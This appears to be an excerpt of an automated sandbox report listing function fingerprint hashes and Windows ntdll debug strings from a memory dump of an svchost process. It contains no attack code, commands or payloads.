                                                                    • Instruction ID: 8f7f7a54388f16d40468366491359ca44aeeb5c15045de2da7f0d70a4fbb8787
                                                                    • Opcode Fuzzy Hash: 29eb063e0ff56d2629be013ed7575b20f267b818822edeb5b476ec8fba3bb552
                                                                    • Instruction Fuzzy Hash: 89F0E274A11348ABDB04EBB9D549E9E77B4EF08700F410058F101EF380D974D9019718
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                    • Instruction ID: c8a76dd76166bd055a517a04fc9b68d60e40d03babd9cc9a09acfa8f61b3c8d5
                                                                    • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                    • Instruction Fuzzy Hash: AAF0ED3E2043409BDB16DF19C540AA57BB8EB4A360B1400D8E8428B300EB32E986CB84
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                                    • Instruction ID: 667646c4acd9c90df5db0835e992e47794fb80a9e82e5a33178599539b90fce5
                                                                    • Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                                    • Instruction Fuzzy Hash: 35E06D76210200AFE764DB58CD45FA673ECEB01720F540258B115971D0DAB0AE40CA64
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                    • Instruction ID: 324ce669774715bd7523f383deaab3ad2220d0cc93b8e71b337ecbbcd759d54f
                                                                    • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                    • Instruction Fuzzy Hash: 55E0CD35245714B7DB22AA40CD00F697B15DF507D0F108035FA085F750C5719C55D6D4
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                    • Instruction ID: 834d9d46293665bc714a4952a0fee6aea5080fbeb180ccfb76e4a3b2355934a0
                                                                    • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                    • Instruction Fuzzy Hash: 6EE08C35502A20EEDB31EF11DD14B527AB5FB88B10F26896DE0810B5A487B0A892DE8C
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e73b94475550c6a3cdf18838e5e83ccdfd1444e4c3d6ebe705afbddb7c31e449
                                                                    • Instruction ID: 4fc80d0275829fe69c39a1ac3eb2d17e58b6e379bd7d2cefe220812c93006c69
                                                                    • Opcode Fuzzy Hash: e73b94475550c6a3cdf18838e5e83ccdfd1444e4c3d6ebe705afbddb7c31e449
                                                                    • Instruction Fuzzy Hash: 05F0E535651B84CFE72ADF08C2E2B91B7F9FB55B40F504458D4468BBA1C73AA982CF40
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bab4011fdeb0f07e60481eab7e94cb91a9ab15f20f954a9dab46cfa851d51685
                                                                    • Instruction ID: 3f03268d082549aa26ce4025d68eafaacb6b2add09ddbdc6fdd8da8a1a2f0dff
                                                                    • Opcode Fuzzy Hash: bab4011fdeb0f07e60481eab7e94cb91a9ab15f20f954a9dab46cfa851d51685
                                                                    • Instruction Fuzzy Hash: C9E0C2322006506BC322FB5DDD10F4A739EEFA6360F104129F1508B6D0CA64AC10C798
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                    • Instruction ID: d3de3aa9678e021175f0947359b12a437c95e03ed9ad89388b6dc1abe070a9ed
                                                                    • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                    • Instruction Fuzzy Hash: 38D0223231243093CB28E690A904F63AD059B81AA4F1B002C380AD3A00C8048C43CAE0
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                    • Instruction ID: 8bd5c1e0bd502fe523ba95dac60c23bdcf5ef5e396790d1cbbcdc18959c8f268
                                                                    • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                    • Instruction Fuzzy Hash: 9CD0C935612E80CFD71BCF0DC6A4B16B3B8BB44B44F8504D0E501CBB61D66CD940CE04
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                    • Instruction ID: 52208dc3bd3bb9504633463a0321448ccbdca99ade4cec2e0de288df4d999b65
                                                                    • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                    • Instruction Fuzzy Hash: 22D05E35945AC4CFE727CB18C265B907BF8F705B40F890098E04247BA2C37C99C4CB50
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                    • Instruction ID: 142202c581ec9fb6b0fdeb4b43bf4ed0287658d7f429c13d5e3ffbf13a924662
                                                                    • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                    • Instruction Fuzzy Hash: 79C08C3B290748AFC712EF98CD01F027BA9EB98B40F104021F3048B670C631FC20EA88
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                    • Instruction ID: 7b133768ff382e91061a2b238a6dde3637b3062e847eb15f81908f712d765a28
                                                                    • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                    • Instruction Fuzzy Hash: 40D01236100248EFCB01DF41C890D9A772AFBD8710F148019FD190B6108A31ED62DA50
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                    • Instruction ID: f7560e59d52c7628f4e291dd9aaa5755ee699e022ef6aff0f5a2646e5223fa01
                                                                    • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                    • Instruction Fuzzy Hash: FBC04879B01A418FCF15EB2AD394F8977E8FB48740F2918D0E805CBB21E624E811CA10
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 220226324abee41323fabff9899d2359fe1387d4f3b373e1cee263fcacd492e0
                                                                    • Instruction ID: 809977f9366c9fbda9797c0c7b21ec1f7a491882b24f294b8462c3611699f634
                                                                    • Opcode Fuzzy Hash: 220226324abee41323fabff9899d2359fe1387d4f3b373e1cee263fcacd492e0
                                                                    • Instruction Fuzzy Hash: 15900231605804129140B65848C4586400697E4301B95C111E0424658D8B548A565361
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5ffe97900863f1f6ff1fb622b6e799d50167bfc579d0f4b73415c3792cafc80a
                                                                    • Instruction ID: 1243aa40728cc219c0e853640e3437e38871ba296fc17e87c24475fa547900fe
                                                                    • Opcode Fuzzy Hash: 5ffe97900863f1f6ff1fb622b6e799d50167bfc579d0f4b73415c3792cafc80a
                                                                    • Instruction Fuzzy Hash: C390022120184842D140B7584844B4F410687E5302FD5C119A4156658DCA5589555721
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3484f65dd6c4792e7194fb63c30e54d09e656ec6a7b9dc6b120d8ad9b1bb012f
                                                                    • Instruction ID: dde3a08161755d95cfd4ceaf3303ddde0fd82be681a6119467755975f2868bc9
                                                                    • Opcode Fuzzy Hash: 3484f65dd6c4792e7194fb63c30e54d09e656ec6a7b9dc6b120d8ad9b1bb012f
                                                                    • Instruction Fuzzy Hash: 3690022124140C02D140B65884547470007C7D4701F95C111A0024658E87568A6566B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 847cbb0c131c6079d94eee7b445a3d08d2fc4e92f06adea91e87819f2162aca8
                                                                    • Instruction ID: 2adb74a592e17b02683643e347870d444cf33e8ca16646f475d114a35ec6c132
                                                                    • Opcode Fuzzy Hash: 847cbb0c131c6079d94eee7b445a3d08d2fc4e92f06adea91e87819f2162aca8
                                                                    • Instruction Fuzzy Hash: CD900261601504424140B6584844446600697E53013D5C215A0554664D875889559269
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0d626bd91d65d7d372195edb5faf2278834fd64f8a997008c243e8304fa74afa
                                                                    • Instruction ID: 45fe79f86ada4a08304903ed8f6a16fdb893b5eff3353011f0b806c660d03e00
                                                                    • Opcode Fuzzy Hash: 0d626bd91d65d7d372195edb5faf2278834fd64f8a997008c243e8304fa74afa
                                                                    • Instruction Fuzzy Hash: 5190023120544C42D140B6584444A86001687D4305F95C111A0064798E97658E55B661
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c4ddd402f7adcbc87f20f0d8804259ccab9924af19a446120d43bc84c95672c4
                                                                    • Instruction ID: 9b1f26a2aaeee0eb726926c5200498220773c51982f232afdb7d29ea440c4cce
                                                                    • Opcode Fuzzy Hash: c4ddd402f7adcbc87f20f0d8804259ccab9924af19a446120d43bc84c95672c4
                                                                    • Instruction Fuzzy Hash: D890023120140C02D180B658444468A000687D5301FD5C115A0025758ECB558B5977A1
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ba51f4069295b75a70f253e196f475a8fe8e23e9bd12d9cd149cb58aef0ef2c4
                                                                    • Instruction ID: e255ac6017c0f8023d8087a68b876ccfe483b10b3dd1a74a8bc27fc882ffe6f0
                                                                    • Opcode Fuzzy Hash: ba51f4069295b75a70f253e196f475a8fe8e23e9bd12d9cd149cb58aef0ef2c4
                                                                    • Instruction Fuzzy Hash: 3E90023160540C02D150B6584454786000687D4301F95C111A0024758E87958B5576A1
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2e336c2bae22b68fa82394d434983f0582b9d98caba37d89976c90496bba4b11
                                                                    • Instruction ID: d27d50eb9e267a84cd43bdfbd004b7f2e4d9746ac91feac522289bbceca1fa9f
                                                                    • Opcode Fuzzy Hash: 2e336c2bae22b68fa82394d434983f0582b9d98caba37d89976c90496bba4b11
                                                                    • Instruction Fuzzy Hash: 6990023120140C02D104B65848446C6000687D4301F95C111A6024759F97A589917131
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9865da355708da3dee31bec0f9514a92978feab2fe243d9eb4a2459ada50ae9d
                                                                    • Instruction ID: 1876c73531c03fd5f33fb72b88d5b2296e29a5202e95ac72e0d702bfd56775b3
                                                                    • Opcode Fuzzy Hash: 9865da355708da3dee31bec0f9514a92978feab2fe243d9eb4a2459ada50ae9d
                                                                    • Instruction Fuzzy Hash: 87900225221404020145FA58064454B044697DA3513D5C115F1416694DC76189655321
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2cadfc41327b4bb12c4be7e172952bb3ff4bd0c15ff566897a5d3e929471c4f4
                                                                    • Instruction ID: 5c99afa0f746733a33a2d0d181c16d202c37b6c620a31395c28dca174068b168
                                                                    • Opcode Fuzzy Hash: 2cadfc41327b4bb12c4be7e172952bb3ff4bd0c15ff566897a5d3e929471c4f4
                                                                    • Instruction Fuzzy Hash: FA900435311404030105FF5C07445470047C7DD3513D5C131F1015754DD771CD715131
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4fe177197ea429e200ca16a264de4a8484007e0c328eaa6aceb1b52ffcc73c68
                                                                    • Instruction ID: a5514a58808e01875ab92ee86d1382bcba904d50a5c1e4240ddb71d473100e17
                                                                    • Opcode Fuzzy Hash: 4fe177197ea429e200ca16a264de4a8484007e0c328eaa6aceb1b52ffcc73c68
                                                                    • Instruction Fuzzy Hash: 099002A1201544924500F7588444B4A450687E4301B95C116E1054664DC66589519135
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3017c3c725664d8964b22ba38fe065551955177301b43a76e6bb452047da1bc0
                                                                    • Instruction ID: b91b390339b3ce60c56b9f67de7451120a0410e939cc0a370b205825e8be5faf
                                                                    • Opcode Fuzzy Hash: 3017c3c725664d8964b22ba38fe065551955177301b43a76e6bb452047da1bc0
                                                                    • Instruction Fuzzy Hash: AD90022124545502D150B65C44446564006A7E4301F95C121A0814698E869589556221
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bc50fdbdb35479085fcb93b29b35b7546b92f2e75d72c13a61f241a31d19a837
                                                                    • Instruction ID: dedf5f136aad4d1561ab92e674ea2aae08af5c11f3155595e8e5fe61118c5127
                                                                    • Opcode Fuzzy Hash: bc50fdbdb35479085fcb93b29b35b7546b92f2e75d72c13a61f241a31d19a837
                                                                    • Instruction Fuzzy Hash: 4090026121140442D104B6584444746004687E5301F95C112A2154658DC6698D615125
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 40dde0c8389298ad797ae564f8d4a8148028744fb6309ae09c708644ea90493b
                                                                    • Instruction ID: 4cf9eaf36b44b2e0c33c4b9db8789212870a99f51b200a27fb2f26bb02034f24
                                                                    • Opcode Fuzzy Hash: 40dde0c8389298ad797ae564f8d4a8148028744fb6309ae09c708644ea90493b
                                                                    • Instruction Fuzzy Hash: 3B90026134140842D100B6584454B460006C7E5301F95C115E1064658E8759CD526126
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b7d77cbb24993b8e9b22c03e2ab0a95b5023f68450dab8eaf4f102ea49a633bb
                                                                    • Instruction ID: 33800ff4ef5930c83dd1e0d9663238ba41a3c577db1de7273f67c2703e97dc23
                                                                    • Opcode Fuzzy Hash: b7d77cbb24993b8e9b22c03e2ab0a95b5023f68450dab8eaf4f102ea49a633bb
                                                                    • Instruction Fuzzy Hash: D6900221211C0442D200BA684C54B47000687D4303F95C215A0154658DCA5589615521
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a16abbccfafa53485995b015bced318b8554390a1a54b6a1ef4a67d89ea85116
                                                                    • Instruction ID: 08ba8383abdcda55cd4713981f4300cb836be1f6ecaf7edb84538028a7d6f747
                                                                    • Opcode Fuzzy Hash: a16abbccfafa53485995b015bced318b8554390a1a54b6a1ef4a67d89ea85116
                                                                    • Instruction Fuzzy Hash: 9C90023120180802D100B6584848787000687D4302F95C111A5164659F87A5C9916531
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    • API String ID: 48624451-2108815105
                                                                    Strings
                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 036A4725
                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 036A46FC
                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 036A4655
                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 036A4787
                                                                    • Execute=1, xrefs: 036A4713
                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 036A4742
                                                                    • ExecuteOptions, xrefs: 036A46A0
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                    • API String ID: 0-484625025
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm
                                                                    • String ID: +$-$0$0
                                                                    • API String ID: 1302938615-699404926
                                                                    Strings
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 036A02E7
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 036A02BD
                                                                    • RTL: Re-Waiting, xrefs: 036A031E
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                    • API String ID: 0-2474120054
                                                                    • Opcode ID: 5c9d4e05ed4a05016203769acde3f14b68fe71f49a5af58ff29875d289cb6bb5
                                                                    • Instruction ID: e1a06293db47928e79b114aa7b7cb4fa5c352d3c65127280c81266835c73c532
                                                                    • Opcode Fuzzy Hash: 5c9d4e05ed4a05016203769acde3f14b68fe71f49a5af58ff29875d289cb6bb5
                                                                    • Instruction Fuzzy Hash: EFE1AC30604B41DFD724CF28C984B6ABBE4BB88324F184A6DF9A58B3E1D775D945CB42
                                                                    Strings
                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 036A7B7F
                                                                    • RTL: Resource at %p, xrefs: 036A7B8E
                                                                    • RTL: Re-Waiting, xrefs: 036A7BAC
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 0-871070163
                                                                    • Opcode ID: 64f37b5f49c7cbb868b5435088455b61dd17b3d134c2b7a30f8c2c38b70c79f2
                                                                    • Instruction ID: feb268656fc47c528e7ff28105b3daa6eb5c38468374b890b9c267555df3ac5b
                                                                    • Opcode Fuzzy Hash: 64f37b5f49c7cbb868b5435088455b61dd17b3d134c2b7a30f8c2c38b70c79f2
                                                                    • Instruction Fuzzy Hash: BF41E2353007029FC724DE6ACD40B6AB7E9EF88760F140A2DE85ADB790DB70E8058F95
                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 036A728C
                                                                    Strings
                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 036A7294
                                                                    • RTL: Resource at %p, xrefs: 036A72A3
                                                                    • RTL: Re-Waiting, xrefs: 036A72C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
